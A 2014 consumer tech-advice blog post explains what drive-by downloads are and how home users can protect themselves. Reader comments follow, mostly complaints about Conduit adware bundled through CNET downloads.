Drive-by Download Dangers
The term “drive-by download” is often encountered in security bulletins and the media reports they inspire. What, exactly, is a drive-by download? Who is vulnerable to it? And how can you protect yourself against drive-by downloads? Read on for answers...
What is a Drive-by Download?
The use of the term “drive-by” conjures up images of innocent victims catching bullets fired from a moving car, with the added pathos of injury caused by a bad guy who was aiming at someone else. The insinuation is that the victim totally didn’t deserve to get shot and is completely blameless for getting hit. Sometimes that is true in the case of drive-by downloads, but not always.
There are two types of “drive-by downloads.” Both refer to an unintentional downloading of malicious software from a website. In the first type, the victim knows he is downloading something but does not know or understand the consequences of doing so. In the second type, a file is downloaded to the victim’s machine without his or her knowledge or consent.
Everyone who surfs the Web is potentially vulnerable to drive-by downloads. They can also be triggered by viewing an email which entices users to click a link to a malicious website.
Malicious software can be cloaked in sheep’s clothing, purporting to be a desirable app that most people will want to download and install. It might even be represented as an anti-malware app; irony aside, what better way to get a victim to lower his or her defenses than by saying, “Disable any existing security software you may have running to avoid conflicts with this anti-malware app?”
Surreptitious downloads give victims no warning that anything is being installed; just loading a Web page in one’s browser or opening an HTML email can (under certain circumstances) trigger hidden code that starts the downloading and installation. Those "certain circumstances" almost always involve vulnerable (unpatched) application software, security software that's outdated, or computers that lack the latest operating system security patches. In some rare cases, a new exploit may slip past even the best defenses and trigger a malicious drive-by download. (See How I Got Hacked... And Why You MUST Have a Backup! and Avoiding Zero-Day Exploits.)
Protection From Drive-By Downloads
Protection against drive-by downloads starts with awareness and appropriate caution. If you know that any software can be malware in disguise, it’s best to stick to downloading apps from sources you have reason to trust. (See Downloading? Watch Out For These Danger Signs) Don't click links in emails, unless you're 100% sure you know where that link will lead. Even if the email appears to be from a friend or a company with which you do business, it could be spoofed. Use a bookmark, type the website address manually, or check with the sender to make sure they really did send it.
Your next step is to make sure that all the software on your computer is up to date with the latest patches and fixes. Using Windows Update will keep you current with the latest Windows security patches from Microsoft. But you've also got third-party software on your computer that can be an attack vector. See Computer Security: The Missing Link to learn how to address the problem.
And of course, anti-malware protection is a must. My article Free Anti-Virus Programs will hook you up with some of the best Internet security software, and save you money in the process.
Protection is also built into most modern browsers. Some techniques rely on crowd-sourced databases of known “rogue” websites from which others have received drive-by downloads. Others rely on monitoring closely the behavior of Web pages or emails for signs that they are trying to download or install something, blocking the suspicious behavior, and notifying you so that you can deny or authorize the suspicious action.
The Devil You Know, or the Devil You Don't Know?
Any site can be invaded by hackers who install hidden code that triggers a drive-by download when visitors view the site’s pages. And it's not just the sketchy or "adult" sites that are likely to harbor malware. One study showed that users are more likely to catch a drive-by download from a religious site than from a p**n site. The reason is that most religious (as well as non-commercial, hobby or personal) sites don’t have much money to spend on security, or lack the technical skills to protect their servers.
Bottom line, be careful what and where you download. Be extra careful and attentive when it comes to links in emails. Keep your application and system software up to date, and use at least one layer of anti-malware protection. I can't promise that will protect you from every conceivable present and future attack, but that's the best set of defenses available now.
Have you been hit with a drive-by download? Your thoughts on this topic are welcome. Post your comment or question below...
This article was posted by Bob Rankin on 28 Apr 2014
|For Fun: Buy Bob a Snickers.|
The Best Upgrades for Your Computer?
The Top Twenty
The End of Free TV?
Post your Comments, Questions or Suggestions
Free Tech Support -- Ask Bob Rankin
Subscribe to AskBobRankin Updates: Free Newsletter
Copyright © 2005 - Bob Rankin - All Rights Reserved
Article information: AskBobRankin -- Drive-by Download Dangers (Posted: 28 Apr 2014)
Copyright © 2005 - Bob Rankin - All Rights Reserved
Most recent comments on "Drive-by Download Dangers"
28 Apr 2014
I don't think updating Windows will do me any good on my Mac.
EDITOR'S NOTE: Well, you CAN run Windows on an Intel-powered Mac computer. :-)
28 Apr 2014
"Conduit" gave me lots of grief. It hijacked my browser and directed it to their preferred sites. I had to edit the registry to completely rid my computer of this very invasive malware. The "free" Conduit program should be avoided completely.
28 Apr 2014
Several times I have downloaded Torrents and Programs (Zipped) that contain multiple files.
After downloading, I opened the items and found files missing. Shortly after that my AV reports quarantine of Trojans, etc.
Yes , my system has been hijacked by Conduit and some others. A lot of time put in investigating and removing this S**t!
Just Backup, Backup, Backup! This issue will not be going away anytime soon.
My $0.02 CDN
28 Apr 2014
Thank goodness ... I was not the only person "plagued" by the Conduit mess and invasion!!! The ONLY reason, I got my Conduit mess, was "trusting" CNET Download!!!
I did not authorize it, nor did I know that it was being installed on my computer. What has made me, still so mad, is that CNET use to be one of the most reliable download sources, around ... NOT any more.
I "listen" to what my Avast! Internet Security and Malwarebytes Premium tells me, about safe websites or "bad" ones. The problem with both of those programs and most others out there ... The websites are "judged" mostly by humans, not scanning software.
I use to use WOB, years ago ... Until, I found out that the only "score" a website was given, was by people, which meant that the Bad Guys could easily be giving "good, high scores", so, that they could continue to do their dirty deeds. CNET's website is considered "safe", since, most of the website is fine, for reading articles and just overlooking the website. The problem begins when you go to download something. CNET has made it a major hassle to do a simple download, for a long, long time. All sorts of Ads pop-up and get in your way, to do a simple download. I now, understand their method. Confuse the masses, so that we can "install" Foistware on you, at your peril!!! Not this kid ... No, no, no! I have moved on and now, refuse to use CNET anything!
Awareness is a good thing and makes for some smart decisions. :)
29 Apr 2014
Bob has previously written about, in essence, what a turn for the worse CNET chose. Yes, at one time, many years ago, it was the place to go, but apparently they lost sight of their consumers. As techno-savvy as most of the CNET writers are and their staff tech writers, I can't help but wonder how many of the long-term crowd of writers and techies have abandoned ship. I would today, be embaraassed to say I "work" for CNET. As with much of the way with life, really good things go bad when corporate panders to its investors and dollars and kicks the consumer to the curb! I can't count the number of times I've had to help people get rid of Conduit. Thank heaven there are a few great uninstaller programs that can erase all traces of it, including in the registry. It's just time consuming because pieces of Conduit hide in many corners of your computer-such as "hidden files" and you have to go on a hunting exhibition to force uninstall every remnant. CNET has been blasted about this practice of making what you want to download harder as well as adding other programs to the one you were seeking. The bottom line is they won't get the message until people halt using their site. Until then, they will continue to continue and blame the user.BTW-there are other sites that used to be well respected for not giving you a "driveby", but more and more, the legitimacy is falling to the wayside.I no longer use an intermediary service for a download, but go directly to the site of the software company itself and download it from there.I actually did this when I used to hear about something on CNET and they had a direct link to the software maker's site.Lesson:"Convenience can be harmful to your emotional health as well as your computer".
30 Apr 2014
Great article, BOB. Thank you!.
I regularly back up with a ClickFree device, and scan with Advanced Systems Care 6, which also keeps me running fast.
Sticking with XP, but I'm prepared to reformat if I have a problem and a destructive restore doesn't work.
30 Apr 2014
I have to echo the comments made about CNET. Once upon a time they were a very good resource for getting quality downloads of freeware, in fact I use to tell my friends and family to use them. Unfortunately several years back I heard a rather disturbing story about someone that got some nasty malware on their system from something they downloaded from CNET. When I investigated, I found this to be true and have since stopped using their site and no longer recommend it to anyone. I actually warn people against using it in fact. As long as it is profitable for CNET to make money from these malware companies they will never go back to being a reputable place to download from. I constantly hammer my friends to be careful and cognizant of what they are doing and don't just hit "continue" without reading what you are doing. Although you don't have to read every word of an agreement (but you should at least understand what it says) at least read what it is that you are downloading and remove all the extra check marks "for other things you may want" because they are rarely, ever anything you really want or need.
04 May 2014
For the tech savvy I Recommend the software, Free Fixer which does a diagnostic of your computer informing you of the good and bad files you have on your computer system.
You see a file you believe has gone rogue . . . you simply delete it!
In order for this application to be successful though one should basically know to distinguish between files.
You can download the Free or Paid version of this amazing software at www.freefixer.com
(I recently spoke to the creator of FF, a Mr. Roger who informed that a better model will be coming out in the future. I cannot wait for that version!)
note: I am not an employee of Free Fixer nor am I compensated spoke person for same. I simply believe in this software as he it once saved my computer system from complete annihilation from a particularly pernicious rootkit I once encountered on my computer system made possible via a drive-by download!